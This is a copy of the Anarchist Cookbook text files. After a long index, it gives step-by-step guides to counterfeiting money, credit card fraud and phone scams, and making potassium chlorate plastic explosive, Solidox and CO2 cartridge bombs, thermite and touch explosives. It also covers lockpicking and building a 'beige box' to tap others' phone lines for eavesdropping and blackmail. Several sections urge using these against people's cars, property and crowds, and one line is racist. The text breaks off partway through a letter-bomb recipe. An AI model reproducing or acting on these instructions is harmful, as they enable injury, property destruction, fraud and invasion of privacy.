The Anarchists Cookbook - Part 1
Cookbook Part 2
The Index:
Counterfeiting
Money
Credit Card
Fraud
Making
Plastic Explosives
Picking
Master Locks
The Arts of
Lockpicking I
The Arts of
Lockpicking II
Solidox
Bombs
High Tech
Revenge
CO2 Bombs
Thermite
Bombs
Touch
Explosives
Letter Bombs
Paint
Bombs
Ways to send
a car to HELL
And Even
More Ways
Do ya hate
school?
Phone
related vandalism
Police radar
jamming
Smoke Bombs
Mail
Box Bombs
Hotwiring
cars
Napalm
Fertilizer
Bomb
Tennis Ball
Bomb
Diskette
Bombs
Unlisted
Phone Numbers
Fuses
Make
Potassium Nitrate
Exploding
Lightbulbs
Under water
igniters
Home-brew
blast cannon
Chemical
Equivalency List
Phone Taps
Landmines
Another
Molitov Cocktail
Phone
Systems Tutorial I
Phone
Systems Tutorial II
Phone
Systems Tutorial III
Basic
Alliance Teleconferencing
Aqua Box
Plans
Hindenberg
Bomb
Kill with
your Bare Hands
Black Box
Plans
The Blotto
Box
Blowgun
Brown
Box Plans
Calcium
Carbide Bomb
Ripping off
Change Machines
Clear Box
Plans
CNA Number
Listing
Electronic
Terrorism
Conference
w/o 2600hz/M-F
Dynamite
Auto
Exhaust Flame Thower
Break into
BBS Express
Firebomb
Fuse
Bomb
Generic Bomb
Green
Box Plans
Portable
Grenade Launcher
Basic
Hacking Tutorial I
Basic
Hacking Tutorial II
Hacking
DEC's
Harmless
Bombs
Breaking
into Houses
Hypnotism
Remote
Informer Issue #1
Jackpotting
ATM Machines
Jug Bomb
Fun
at K-Mart
Mace
Substitute
How to Grow
Marijuana
Match Head
Bomb
Terrorizing
McDonalds
"Mentor's"
Last Words
The 2600hz
Detector
Blue Box
Plans
Napalm II
Nitroglycerin
Recipe
Operation:
Fuckup
Freecalls
from Payphones
Pool Fun
Free
Postage
Unstable
Explosives
Weird Drugs
The
Art of Carding
Recognizing
Credit Cards
How to Get a
New Identity
Remote
Informer Issue #2
Remote
Informer Issue #3
Remote
Informer Issue #4
Remote
Informer Issue #5
Phreaker's
Guide to Loop Lines
Ma-Bell
Tutorial
Get Money
out of Pay Phones
Computer-based
PBX
PC-Pursuit
Port Statistics
Pearl Box
Plans
The Phreak
File
Red Box
Plans
RemObs
Scarlet Box
Plans
Silver Box
Plans
Bell
Trashing
Canadian
WATS Phonebook
Hacking TRW
Hacking VAX
& UNIX
Verification
Circuits
White Box
Plans
The BLAST
Box
Dealing with
the Operator
Cellular
Phone Phreaking
Cheesebox
Plans
Start Your
Own Conferences
Gold Box
Plans
The History
of ESS
The Lunch
Box
Olive Box
Plans
The Tron Box
"Phreaker's
Phunhouse"
PM 3,27
(Intro to MIDNET)
PM 3,27 (The
Making of a Hacker)
PM 3,28
(Network Miscellany)
PM 3,28
(Pearl Box Schematic)
PM 3,28
(Snarfing Remote Files)
PM 3,30
(Western Union, Telex, TWX & Time Service)
PM 3,30
(Hacking & Tymnet)
PM 3,30 (The
DECWRL Mail Gateway)
Index
Counterfeiting Money by JRoger
Before reading this article, it would be a very good idea to get a book
on photo offset printing, for
this is the method used in counterfeiting US
currency. If you are familiar with this method of
printing, counterfeiting
should be a simple task for you.
Genuine currency is made by a process
called "gravure", which involves etching a metal block. Since
etching a
metal block is impossible to do by hand, photo offset printing comes into the
process.
Photo offset printing starts by making negatives of the
currency with a camera, and putting the
negatives on a piece of masking
material (usually orange in color). The stripped negatives, commonly
called
"flats", are then exposed to a lithographic plate with an arc light plate maker.
The burned
plates are then developed with the proper developing chemical.
One at a time, these plates are wrapped
around the plate cylinder of the
press.
The press to use should be an 11 by 14 offset, such as the AB
Dick 360. Make 2 negatives of the
portrait side of the bill, and 1 of the
back side. After developing them and letting them dry, take
them to a light
table. Using opaque on one of the portrait sides, touch out all the green, which
is
the seal and the serial numbers. The back side does not require any
retouching, because it is all one
color. Now, make sure all of the negatives
are registered (lined up correctly) on the flats. By the
way, every time you
need another serial number, shoot 1 negative of the portrait side, cut out the
serial number, and remove the old serial number from the flat replacing it
with the new one.
Now you have all 3 flats, and each represents a
different color: black, and 2 shades of green (the two
shades of green are
created by mixing inks). Now you are ready to burn the plates. Take a
lithographic
plate and etch three marks on it. These marks must be 2 and
9/16 inches apart, starting on one of the
short edges. Do the same thing to
2 more plates. Then, take 1 of the flats and place it on the plate,
exactly
lining the short edge up with the edge of the plate. Burn it, move it up to the
next mark, and
cover up the exposed area you have already burned. Burn that,
and do the same thing 2 more times,
moving the flat up one more mark. Do the
same process with the other 2 flats (each on a separate
plate). Develop all
three plates. You should now have 4 images on each plate with an equal space
between each bill.
The paper you will need will not match exactly,
but it will do for most situations. The paper to use
should have a 25% rag
content. By the way, Disaperf computer paper (invisible perforation) does the
job well. Take the paper and load it into the press. Be sure to set the air,
buckle, and paper
thickness right. Start with the black plate (the plate
without the serial numbers). Wrap it around the
cylinder and load black ink
in. Make sure you run more than you need because there will be a lot of
rejects. Then, while that is printing, mix the inks for the serial numbers
and the back side. You will
need to add some white and maybe yellow to the
serial number ink. You also need to add black to the
back side. Experiment
until you get it right. Now, clean the press and print the other side. You will
now have a bill with no green seal or serial numbers. Print a few with one
serial number, make another
and repeat. Keep doing this until you have as
many different numbers as you want. Then cut the bills
to the exact size
with a paper cutter. You should have printed a large amount of money by now, but
there is still one problem; the paper is pure white. To dye it, mix the
following in a pan: 2 cups of
hot water, 4 tea bags, and about 16 to 20
drops of green food coloring (experiment with this). Dip one
of the bills in
and compare it to a genuine US bill. Make the necessary adjustments, and dye all
the
bills. Also, it is a good idea to make them look used. For example,
wrinkle them, rub coffee grinds on
them, etc.
As before mentioned,
unless you are familiar with photo offset printing, most of the information in
this article will be fairly hard to understand. Along with getting a book on
photo offset printing,
try to see the movie "To Live and Die in LA". It is
about a counterfeiter, and the producer does a
pretty good job of showing
how to counterfeit. A good book on the subject is "The Poor Man's James
Bond".
If all of this seems too complicated to you, there is one
other method available for counterfeiting:
The Canon color laser copier. The
Canon can replicate ANYTHING in vibrant color, including US
currency. But,
once again, the main problem in counterfeiting is the paper used. So,
experiment, and
good luck!
-= Exodus =-
Index
Credit Card Fraud:
For most of you out there, money is hard to come by. Until now:
With the recent advent of plastic money (credit cards), it is easy to
use someone else's credit card
to order the items you have always desired in
life. The stakes are high, but the payoff is worth it.
Step One: Getting
the credit card information
First off, you must obtain the crucial item:
someone's credit card number. The best way to get credit
card numbers is to
take the blue carbons used in a credit card transaction at your local department
store. These can usually be found in the garbage can next to the register,
or for the more daring, in
the garbage dumpster behind the store. But, due
to the large amount of credit card fraud, many stores
have opted to use a
carbonless transaction sheet, making things much more difficult. This is where
your phone comes in handy.
First, look up someone in the phone book,
and obtain as much information as possible about them. Then,
during business
hours, call in a very convincing voice - "Hello, this is John Doe from the Visa
Credit
Card Fraud Investigations Department. We have been informed that your
credit card may have been used
for fraudulent purposes, so will you please
read off the numbers appearing on your Visa card for
verification." Of
course, use your imagination! Believe it or not, many people will fall for this
ploy
and give out their credit information.
Now, assuming that you
have your victim's credit card number, you should be able to decipher the
information given.
Step Two: Recognizing information from carbon
copies
Card examples:
[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE
Explanation:
MM/Y1 is the date
the card was issued, and MM/Y2 is the expiration date. The American Express Gold
Card has numbers XXXXXX XXXXXXXX XXXXXXXX, and is covered for up to
$5000.00, even if the card holder
is broke.
[Mastercard]
5XXX XXXX
XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
JOE SHMOE
Explanation:
XXXX in the second row may be asked for during the ordering process. The
first date is when the card
was new, and the second is when the card
expires. The most frequent number combination used is 5424
1800 XXXX XXXX.
There are many of these cards in circulation, but many of these are on wanted
lists,
so check these first.
[Visa]
4XXX XXX(X) XXX(X) XXX(X)
MM/YY MM/YY*VISA
JOE SHMOE
Explanation:
Visa is the most
abundant card, and is accepted almost everywhere. The "*VISA" is sometimes
replaced
with "BWG", or followed with a special code. These codes are as
follows:
[1] MM/YY*VISA V - Preferred Card
[2] MM/YY*VISA CV - Classic
Card
[3] MM/YY*VISA PV - Premier Card
Preferred Cards are backed
with money, and are much safer to use. Classic Cards are newer, harder to
reproduce cards with decent backing. Premier Cards are Classic Cards with
Preferred coverage. Common
numbers are 4448 020 XXX XXX, 4254 5123 6000
XXXX, and 4254 5123 8500 XXXX. Any 4712 1250 XXXX XXXX
cards are IBM Credit
Union cards, and are risky to use, although they are usually covered for large
purchases.
Step Three: Testing credit
You should now have a
Visa, Mastercard, or American Express credit card number, with the victim's
address, zip code, and phone number. By the way, if you have problems
getting the address, most phone
companies offer the Address Tracking
Service, which is a special number you call that will give you an
address
from a phone number, at a nominal charge. Now you need to check the balance of
credit on the
credit card (to make sure you don't run out of money), and you
must also make sure that the card isn't
stolen. To do this you must obtain a
phone number that businesses use to check out credit cards during
purchases.
If you go to a department store, watch the cashier when someone makes a credit
card
purchase. He/she will usually call a phone number, give the credit
information, and then give what is
called a "Merchant Number". These numbers
are usually written down on or around the register. It is
easy to either
find these numbers and copy them, or to wait until they call one in. Watch what
they
dial and wait for the 8 digit (usually) merchant number. Once you call
the number, in a calm voice,
read off the account number, merchant number,
amount, and expiration date. The credit bureau will tell
you if it is ok,
and will give you an authorization number. Pretend you are writing this number
down,
and repeat it back to them to check it. Ignore this number completely,
for it serves no real purpose.
However, once you do this, the bank removes
dollars equal to what you told them, because the card was
supposedly used to
make a purchase. Sometimes you can trick the operator by telling her the
customer
changed his mind and decided not to charge it. Of course, some will
not allow this. Remember at all
times that you are supposed to be a store
clerk calling to check out the card for a purchase. Act like
you are talking
with a customer when he/she "cancels".
Step Four: The drop
Once
the cards are cleared, you must find a place to have the package sent. NEVER use
a drop more than
once. The following are typical drop sites:
[1] An
empty house
An empty house makes an excellent place to send things. Send
the package UPS, and leave a note on the
door saying, "UPS. I work days, 8
to 6. Could you please leave the package on the back door step?" You
can
find dozens of houses from a real estate agent by telling them you want to look
around for a
house. Ask for a list of twenty houses for sale, and tell them
you will check out the area. Do so,
until you find one that suits your
needs.
[2] Rent A Spot
U-Haul sometimes rents spaces where you
can have packages sent and signed for. End your space when the
package
arrives.
[3] People's houses
Find someone you do not know, and
have the package sent there. Call ahead saying that "I called the
store and
they sent the package to the wrong address. It was already sent, but can you
keep it there
for me?" This is a very reliable way if you keep calm when
talking to the people.
Do NOT try post office boxes. Most of the time,
UPS will not deliver to a post office box, and many
people have been caught
in the past attempting to use a post office box. Also, when you have
determined a drop site, keep an eye on it for suspicious characters and cars
that have not been there
before.
Step Five: Making the transaction
You should now have a reliable credit card number with all the necessary
billing information, and a
good drop site.
The best place to order
from is catalogues, and mail order houses. It is in your best interest to
place the phone call from a pay phone, especially if it is a 1-800 number.
Now, when you call, don't
try to disguise your voice, thinking you will
trick the salesperson into believing you are an adult.
These folks are
trained to detect this, so your best bet is to order in your own voice. They
will ask
for the following: name, name as it appears on card, phone number,
billing address, expiration date,
method of shipping, and product. Ask if
they offer UPS Red shipping (next day arrival), because it
gives them less
time to research an order. If you are using American Express, you might have a
bit of
a problem shipping to an address other than the billing address.
Also, if the salesperson starts to
ask questions, do NOT hang up. Simply
talk your way out of the situation, so you won't encourage
investigation on
the order.
If everything goes right, you should have the product, free
of charge. Insurance picks up the tab, and
no one is any wiser. Be careful,
and try not to order anything over $500. In some states, UPS requires
a
signature for anything over $200, not to mention that anything over $200 is
defined as grand theft,
as well as credit fraud. Get caught doing this, and
you will bite it for a couple of years. Good luck!
First compiled in
JRII..
-= Exodus =-
Index
Making Plastic Explosives from Bleach by The Jolly Roger
Potassium chlorate is an extremely volatile explosive compound, and has
been used in the past as the
main explosive filler in grenades, land mines,
and mortar rounds by such countries as France and
Germany. Common household
bleach contains a small amount of potassium chlorate, which can be extracted
by the procedure that follows.
First off, you must obtain:
1. A
heat source (hot plate, stove, etc.)
2. A hydrometer, or battery hydrometer
3. A large Pyrex, or enameled steel container (to weigh chemicals)
4.
Potassium chloride (sold as a salt substitute at health and nutrition stores)
Take one gallon of bleach, place it in the container, and begin heating
it. While this solution heats,
weigh out 63 grams of potassium chloride and
add this to the bleach being heated. Constantly check the
solution being
heated with the hydrometer, and boil until you get a reading of 1.3. If using a
battery
hydrometer, boil until you read a FULL charge.
Take the
solution and allow it to cool in a refrigerator until it is between room
temperature and 0
degrees Celcius. Filter out the crystals that have formed
and save them. Boil this solution again and
cool as before. Filter and save
the crystals.
Take the crystals that have been saved, and mix them with
distilled water in the following
proportions: 56 grams per 100 milliliters
distilled water. Heat this solution until it boils and allow
to cool. Filter
the solution and save the crystals that form upon cooling. This process of
purification is called "fractional crystalization". These crystals should be
relatively pure potassium
chlorate.
Powder these to the consistency
of face powder, and heat gently to drive off all moisture.
Now, melt
five parts Vaseline with five parts wax. Dissolve this in white gasoline (camp
stove
gasoline), and pour this liquid on 90 parts potassium chlorate (the
powdered crystals from above) into
a plastic bowl. Knead this liquid into
the potassium chlorate until intimately mixed. Allow all
gasoline to
evaporate.
Finally, place this explosive into a cool, dry place. Avoid
friction, sulfur, sulfides, and
phosphorous compounds. This explosive is
best molded to the desired shape and density of 1.3 grams in
a cube and
dipped in wax until water proof. These block type charges guarantee the highest
detonation
velocity. Also, a blasting cap of at least a 3 grade must be
used.
The presence of the afore mentioned compounds (sulfur, sulfides,
etc.) results in mixtures that are or
can become highly sensitive and will
possibly decompose explosively while in storage. You should never
store
homemade explosives, and you must use EXTREME caution at all times while
performing the
processes in this article.
You may obtain a catalog
of other subject of this nature by writing:
Information Publishing Co.
Box 10042
Odessa, Texas 79762
-= Exodus =- '94
Index
Picking Master Locks by The Jolly Roger
Have you ever tried to impress someone by picking one of those Master
combination locks and failed?
The Master lock company made their older
combination locks with a protection scheme. If you pull the
handle too hard,
the knob will not turn. That was their biggest mistake.
The first
number:
Get out any of the Master locks so you know what is going on.
While pulling on the clasp (part that
springs open when you get the
combination right), turn the knob to the left until it will not move any
more, and add five to the number you reach. You now have the first number of
the combination.
The second number:
Spin the dial around a
couple of times, then go to the first number you got. Turn the dial to the
right, bypassing the first number once. When you have bypassed the first
number, start pulling on the
clasp and turning the knob. The knob will
eventually fall into the groove and lock. While in the
groove, pull the
clasp and turn the knob. If the knob is loose, go to the next groove, if the
knob is
stiff, you have the second number of the combination.
The
third number:
After getting the second number, spin the dial, then enter
the two numbers. Slowly spin the dial to
the right, and at each number, pull
on the clasp. The lock will eventually open if you did the process
right.
This method of opening Master locks only works on older models. Someone
informed Master of their
mistake, and they employed a new mechanism that is
foolproof (for now).
The older models are from 1988-1990. The newer
models are being cracked on as we speak..
-= Exodus =- '94
Index
The Arts of Lockpicking I courtesy of The Jolly Roger
Lockpicking I: Cars and assorted other locks
While the basic
themes of lockpicking and uninvited entry have not changed much in the last few
years,
some modern devices and techniques have appeared on the scene.
Automobiles:
Many older automobiles can still be opened with a
Slim Jim type of opener (these and other auto
locksmithing techniques are
covered fully in the book "In the Still of the Night", by John Russell
III);
however, many car manufacturers have built cases over the lock mechanism, or
have moved the lock
mechanism so the Slim Jim will not work. So:
American Locksmith Service
P.O. Box 26
Culver City, CA 90230
ALS offers a new and improved Slim Jim that is 30 inches long and 3/4
inches wide, so it will both
reach and slip through the new car lock covers
(inside the door). Price is $5.75 plus $2.00 postage
and handling.
Cars manufactured by General Motors have always been a bane to people
who needed to open them, because
the sidebar locking unit they employ is
very difficult to pick. To further complicate matters, the new
GM cars
employ metal shields to make the use of a Slim Jim type instrument very
difficult. So:
Lock Technology Corporation
685 Main St.
New
Rochelle, NY 10801
LTC offers a cute little tool which will easily
remove the lock cylinder without harm to the vehicle,
and will allow you to
enter and/or start the vehicle. The GMC-40 sells for $56.00 plus $2.00 for
postage and handling.
The best general automobile opening kit is
probably a set of lockout tools offered by:
Steck MFG Corporation
1319
W. Stewart St.
Dayton, OH 45408
For $29.95 one can purchase a
complete set of six carbon lockout tools that will open more than 95% of
all
the cars around.
Kwickset locks have become quite popular as one step
security locks for many types of buildings. They
are a bit harder to pick
and offer a higher degree of security than a normal builder installed door
lock. So:
A MFG
1151 Wallace St.
Massilon, OH 44646
Price is $11.95. Kwickset locks can handily be disassembled and the door
opened without harm to either
the lock or the door by using the above
mentioned Kwick Out tool.
If you are too lazy to pick auto locks:
Veehof Supply
Box 361
Storm Lake, IO 50588
VS sells tryout
keys for most cars (tryout keys are used since there is no one master key for
any one
make of car, but there are group type masters (a.k.a. tryout keys).
Prices average about $20.00 a set.
Updated Lockpicking:
For
years, there have been a number of pick attack procedures for most pin and
tumbler lock systems.
In reverse order of ease they are as follows:
Normal Picking: Using a pick set to align the pins, one by one, until
the shear line is set and the
lock opens.
Racking: This method uses
picks that are constructed with a series of bumps, or diamond shape notches.
These picks are "raked" (i.e. run over all the pins at one time). With luck,
the pins will raise in
the open position and stay there. Raking, if
successful, can be much less of an effort than standard
picking.
Lock Aid Gun: This gun shaped device was invented a number of years ago
and has found application with
many locksmiths and security personnel.
Basically, a needle shaped pick is inserted in the snout of
the "gun", and
the "trigger" is pulled. This action snaps the pick up and down strongly. If the
tip is
slipped under the pins, they will also be snapped up and down
strongly. With a bit of luck they will
strike each other and separate at the
shear line for a split second. When this happens the lock will
open. The
lock aid gun is not 100% successful, but when it does work, the results are very
dramatic.
You can sometimes open the lock with one snap of the trigger.
Vibrator: Some crafty people have mounted a needle pick into an electric
toothbrush power unit. This
vibrating effect will sometimes open pin tumbler
locks -- instantly.
There is now another method to open pin and wafer
locks in a very short time. Although it resembles a
toothbrush pick in
appearance, it is actually an electronic device. I am speaking of the Cobra pick
that is designed and sold by:
Fed Corporation
P.O. Box 569
Scottsdale, AR 85252
The Cobra uses two nine volt batteries, teflon
bearings (for less noise), and a cam roller. It comes
with three picks (for
different types of locks) and works both in America and overseas, on pin or
wafer locks. The Cobra will open group one locks (common door locks) in
three to seven seconds with no
damage, in the hands of an experienced
locksmith. It can take a few seconds more or up to a half a
minute for
someone with no experience at all. It will also open group two locks (including
government,
high security, and medecos), although this can take a short time
longer. It will not open GM sidear
locks, although a device is about to be
introduced to fill that gap. How much for this toy that will
open most locks
in seven seconds?
$235.00 plus $4.00 shipping and handling.
For
you hard core safe crackers, FC also sells the MI-6 that will open most safes at
a cost of $10,000
for the three wheel attack model, and $10,500 for the four
wheel model. It comes in a sturdy aluminum
carrying case with monitor, disk
drive and software.
If none of these safe and sane ideas appeal to you,
you can always fall back on the magic thermal
lance...
The thermal
lance is a rather crude instrument constructed from 3/8 inch hollow magnesium
rods. Each
tube comes in a 10 foot length, but can be cut down if desired.
Each one is threaded on one end. To
use the lance, you screw the tube
together with a matted regulator (like a welding outfit uses) and
hook up an
oxygen tank. Then oxygen is turned on and the rod is lit with a standard welding
ignitor.
The device produces an incredible amount of heat. It is used for
cutting up concrete blocks or even
rocks. An active lance will go through a
foot of steel in a few seconds. The lance is also known as a
burning bar,
and is available from:
C.O.L. MFG
7748 W. Addison
Chicago, IL 60634
Hackers Of The Worls Unite!... TACIV
-= Exodus =- HOTWU!
Index
The Arts of Lockpicking II courtesy of The Jolly Roger
So you want to be a criminal. Well, if you want to be like James Bond
and open a lock in fifteen
seconds, then go to Hollywood, because that is
the only place you are ever going to do it. Even
experienced locksmiths can
spend five to ten minutes on a lock if they are unlucky. If you are wanting
extremely quick access, look elsewhere. The following instructions will
pertain mostly to the "lock in
knob" type lock, since it is the easiest to
pick.
First of all, you need a pick set. If you know a locksmith, get
him to make you a set. This will be
the best possible set for you to use. If
you find a locksmith unwilling to supply a set, don't give up
hope. It is
possible to make your own, if you have access to a grinder (you can use a file,
but it
takes forever).
The thing you need is an allen wrench set
(very small). These should be small enough to fit into the
keyhole slot.
Now, bend the long end of the allen wrench at a slight angle (not 90 degrees).
Now, take
your pick to a grinder or a file, and smooth the end until it is
rounded so it won't hang inside the
lock. Test your tool out on doorknobs at
your house to see if it will slide in and out smoothly. Now,
this is where
the screwdriver comes in. It must be small enough for it and your pick to be
used in the
same lock at the same time, one above the other. In the coming
instructions, please refer to this
chart of the interior of a lock:
______________________________
\ K
| | | | | | / E
| | | | \ Y
[|] Upper tumbler pin
^ ^ / H [^] Lower tumbler pin
^ ^ ^ ^ ^ ^ \ O [-]
Cylinder wall
/ L (This is a greatly simplified
\ E drawing)
______________________________/
The object is to press the pin up so
that the space between the upper pin and the lower pin is level
with the
cylinder wall. Now, if you push a pin up, it's tendency is to fall back down,
right? That is
where the screwdriver comes in. Insert the screwdriver into
the slot and turn. This tension will keep
the "solved" pins from falling
back down. Now, work from the back of the lock to the front, and when
you
are through, there will be a click, the screwdriver will turn freely, and the
door will open.
Do not get discouraged on your first try! It will
probably take you about twenty to thirty minutes
your first time. After
that, you will quickly improve with practice.
Add to TACIV, '94.
-= Exodus =-
Index
Solidox Bombs by The Jolly Roger
Most people are not aware that a volatile, extremely explosive chemical
can be bought over the
counter: Solidox.
Solidox comes in an
aluminum can containing 6 grey sticks, and can be bought at Kmart, and various
hardware supply shops for around $7.00. Solidox is used in welding
applications as an oxidizing agent
for the hot flame needed to melt metal.
The most active ingredient in Solidox is potassium chlorate, a
filler used
in many military applications in the WWII era.
Since Solidox is
literally what the name says: SOLID OXygen, you must have an energy source for
an
explosion. The most common and readily available energy source is common
household sugar, or sucrose.
In theory, glucose would be the purest energy
source, but it is hard to find a solid supply of
glucose.
Making the
mixture:
1. Open the can of Solidox, and remove all 6 sticks. One by one,
grind up each of the sticks
(preferably with a mortar and pestle) into the
finest powder possible.
2. The ratio for mixing the sugar with the Solidox
is 1:1, so weigh the Solidox powder, and grind up
the equivalent amount of
sugar.
3. Mix equivalent amounts of Solidox powder, and sugar in a 1:1
ratio.
It is just that simple! You now have an extremely powerful
substance that can be used in a variety of
applications. A word of caution:
be EXTREMELY careful in the entire process. Avoid friction, heat, and
flame.
A few years back, a teenager I knew blew 4 fingers off while trying to make a
pipe bomb with
Solidox. You have been warned!
SolidOx can no longer
be bought in KMart. A plumbing and heating supply store, or even Sears may have
small quantities for sale, at about $18.00 for 10 stix.
---Exodus
Index
High Tech Revenge: The Beigebox rev. 4.14 by -= Exodus =-
-------------Introduction-------------
Have you ever wanted a
lineman's handset? Surely every phreak has at least once considered the phun
that he could have with one. After searching unlocked phone company trucks
for months, we had an idea.
We could build one. We did, and named it the
"Beige Box" simply because that is the color of ours.
The beigebox is simply
a consumer lineman's handset, which is a phone that can be attached to the
outside of a person's house. To fabricate a beigebox, follow along.
---------Construction and Use---------
The construction is very
simple. First you must understand the concept of the device. In a modular
jack, there are four wires. These are red, green, yellow, and black. For a
single line telephone,
however, only two matter: the red (ring) and green
(tip). The yellow and the black are not neccessary
for this project. A
lineman's handset has two clips on it: the ring and the tip. Take a modular jack
and look at the bottom of it's casing. There should be a grey jack with four
wires (red, green, yellow
& black) leading out of it. To the end of the
red wire attach a red aligator clip. To the end of the
green wire attatch a
green aligator clip. The yellow and black wires can be removed, although I would
only set them aside so that you can use the modular jack in future projects.
Now insert your
telephone's modular plug into the modular jack. That's it.
This particular model is nice because it is
can be easily made, is
inexpensive, uses common parts that are readily available, is small, is
lightweight, and does not require the destruction of a phone.
------------Beige Box Uses------------
There are many uses for a
Beige Box. However, before you can use it, you must know how to attach it to
the output device. This device can be of any of Bell switching apparatus
that include germinal sets
(i.e. remote switching centers, bridgin heads,
cans, etc.). To open most Bell Telephone switching
apparatus, you must have
a 7/16 inch hex driver (or a good pair of needle nose pliers work also). This
piece of equipment can be picked up at your local hardware store. With your
hex driver (or pliers),
turn the security bolt(s) approximately 1/8 of an
inch counter-clockwise and open. If your output
device is locked, then you
must have some knowledge of destroying and/or picking locks. However, we
have never encountered a locked output device. Once you have opened your
output device, you should see
a mass of wires connected to terminals. On
most output devices, the terminals should be labeled "T"
(Tip -- if not
labeled, it is usually on the left) and "R" (Ring -- if not labeled, usually on
the
right).
Remember: Ring - red - right. The "Three R's" -- a
simple way to remember which is which. Now you must
attach all the red
alligator clip (Ring) to the "R" (Ring) terminal. Attach the green alligator
clip
(Tip) to the "T" (Tip) terminal.
Note: If instead of a dial
tone you hear nothing, adjust the alligator clips so that they are not
touching each other terminals. Also make sure they are firmly attached. By
this time you should hear a
dial tone. Dial ANI to find out the number you
are using (you wouldn't want to use your own). Here are
some practicle
aplications:
* Eavesdropping
* Long distance, static free free fone
calls to phriends
* Dialing direct to Alliance Teleconferencing (also no
static)
* Phucking people over
* Bothering the operator at little risk
to yourself
* Blue Boxing with greatly reduced chance of getting caught
* Anything at all you want, since you are on an extension of that line.
Eavesdropping
To be most effective, first attach the Beige Box
then your phone. This eliminates the static caused by
connecting the box,
therefore reducing the potential suspicion of your victim. When eavesdropping,
it
is allways best to be neither seen nor heard. If you hear someone dialing
out, do not panic; but
rather hang up, wait, and pick up the receiver again.
The person will either have hung up or tried to
complete their call again.
If the latter is true, then listen in, and perhaps you will find
information
worthy of blackmail! If you would like to know who you are listening to, after
dialing
ANI, pull a CN/A on the number.
Dialing Long Distance
This section is self explanitory, but don't forget to dial a "1" before
the NPA.
Dialing Direct to Aliance Teleconferencing
Simply dial
0-700-456-1000 and you will get instructions from there. I prefer this method
over PBX's,
since PBX's often have poor reception and are more dificult to
come by.
Phucking People Over
This is a very large topic of
discussion. Just by using the other topics described, you can create a
large
phone bill for the person (they will not have to pay for it, but it will be a
big hassle for
them). In addition, since you are an extension of the
person's line, you can leave your phone off the
hook, and they will not be
able to make or receive calls. This can be extremely nasty because no one
would expect the cause of the problem.
Bothering the Operator
This is also self explanitary and can provide hours of entertainment.
Simply ask her things that are
offensive or you would not like traced to
your line. This also corresponds to the previously described
section,
Phucking People Over. After all, guess who's line it gets traced to? He he he...
Blue Boxing
See a file on Blue Boxing for more details. This is
an especially nice feature if you live in an
ESS-equiped prefix, since the
calls are, once again, not traced to your line...
---POTENTIAL RISKS OF
BEIGE BOXING----
Overuse of the Beige Box may cause suspicians within
the Gestapo, and result in legal problems.
Therefor, I would recomend you:
* Choose a secluded spot to do your Beige Boxing,
* Use more than one
output device
* Keep a low profile (i.e., do not post under your real name
on a public BBS concering your
occomplishments)
* In order to make sure
the enemy has not been inside your output device, I recomend you place a
piece of transparent tape over the opening of your output device. Therefor,
if it is opened in
your abscence, the tapqe will be displaced and you will
be aware of the fact that someone has
intruded on your teritory.
Now, imagine the possibilities: a $2000 dollar phone bill for that
special person, 976 numbers galore,
even harassing the operator at no risk
to you! Think of it as walking into an enemies house, and using
their phone
to your heart's content.
Exodus
Index
How to make a CO2 bomb by the Jolly Roger
You will have to use up the cartridge first by either shooting it or
whatever. With a nail, force a
hole bigger so as to allow the powder and
wick to fit in easily. Fill the cartridge with black powder
and pack it in
there real good by tapping the bottom of the cartridge on a hard surface (I said
TAP
not SLAM!). Insert a fuse. I recommend a good water-proof cannon fuse,
or an m-80 type fuse, but
firecracker fuses work, if you can run like a
black man runs from the cops after raping a white girl.)
Now, light it and
run like hell! It does wonders for a row of mailboxes (like the ones in
apartment
complexes), a car (place under the gas tank), a picture window
(place on window sill), a phone booth
(place right under the phone), or any
other devious place. This thing throws shrapnel, and can make
quit a mess!!
-Jolly Roger-
Index
Thermite II... or A better way to make Thermite by Jolly Roger
Thermite is nasty shit. Here is a good and easy way to make it. The
first step is to get some
iron-oxide (which is RUST!). Here is a good way to
make large quantities in a short time:
- Get a DC convertor like the one
used on a train set. Cut the connector off, seperate the wires, and
strip
them both.
- Now you need a jar of water with a tablespoon or so of
sodium chloride (which is SALT!) added to it.
This makes the water
conductive.
- Now insert both wires into the mixture (I am assuming you
plugged the convertor in...) and let them
sit for five minutes. One of them
will start bubbling more than the other. This is the POSITIVE(+)
wire. If
you do not do this test right, the final product will be the opposite
(chemically) of rust,
which is RUST ACID. You have no use for this here
(although it IS useful!).
- Anyway, put the nail tied to the positive
wire into the jar. Now put the negative wire in the other
end. Now let it
sit overnight and in the morning scrape the rust off of the nail & repeat
until you
got a bunch of rust on the bottom of the glass. Be generous with
your rust collection. If you are
going through the trouble of making
thermite, you might as well make a lot, right?
- Now remove the excess
water and pour the crusty solution onto a cookie sheet. Dry it in the sun for
a few hours, or inside overnight. It should be an orange-brown color
(although I have seen it in many
different colors! Sometimes the color gets
fucked up, what can I say... but it is still iron oxide!)
- Crush the
rust into a fine powder and heat it in a cast-iron pot until it is red. Now mix
the pure
iron oxide with pure alluminum filinos which can be bought or filed
down by hand from an aluminum tube
or bar. The ratio or iron oxide to
aluminum is 8 grams to 3 grams.
- Congrats! You have just made THERMITE!
Now, to light it...
- Thermite requires a LOT of heat (more than a blow
torch!) to ignite. However, a magnesium ribbon
(which is sorta hard to
find.. call around) will do the trick. It takes the heat from the burning
magnesium to light the thermite.
- Now when you see your victim's
car, pour a fifty-cent sized pile onto his hood, stick the ribbon in
it, and
light the ribbon with the blow torch. Now chuckle as you watch it burn through
the hood, the
block, the axle, and the pavement. BE CAREFUL! The ideal
mixtures can vaporize CARBON STEEL! Another
idea is to use thermite to get
into pay phone cash boxes. HAVE FUN!!
See file 195.DOC for Thermite III,
the BEST way to make Thermite..
-= Exodus =-
Index
Touch Explosives by the Jolly Roger
This is sort of a mild explosive, but it can be quite dangerous in large
quantities. To make touch
explosive (such as that found in a snap-n-pop, but
more powerful), use this recipe:
- Mix iodine crystals into ammonia
until the iodine crystals will not dissolve into the ammonia
anymore. Pour
off the excess ammonia and dry out the crystals on a baking sheet the same way
as you
dried the thermite (in other words, just let it sit overnight!).
- Be careful now because these crystals are now your touch explosive.
Carefully wrap a bunch in paper
(I mean carefully! Friction sets 'em off!)
and throw them around.. pretty loud, huh? They are fun to
put on someone's
chair. Add a small fish sinker to them and they can be thrown a long distance
(good
for crowds, football games, concerts, etc.) Have fun!
-Jolly
Roger-
Index
Letter Bombs by The Jolly Roger
- You will first have to make a mild version of thermite. Use my recipe,
but substitute iron fillings
for rust.
- Mix the iron with aluminum
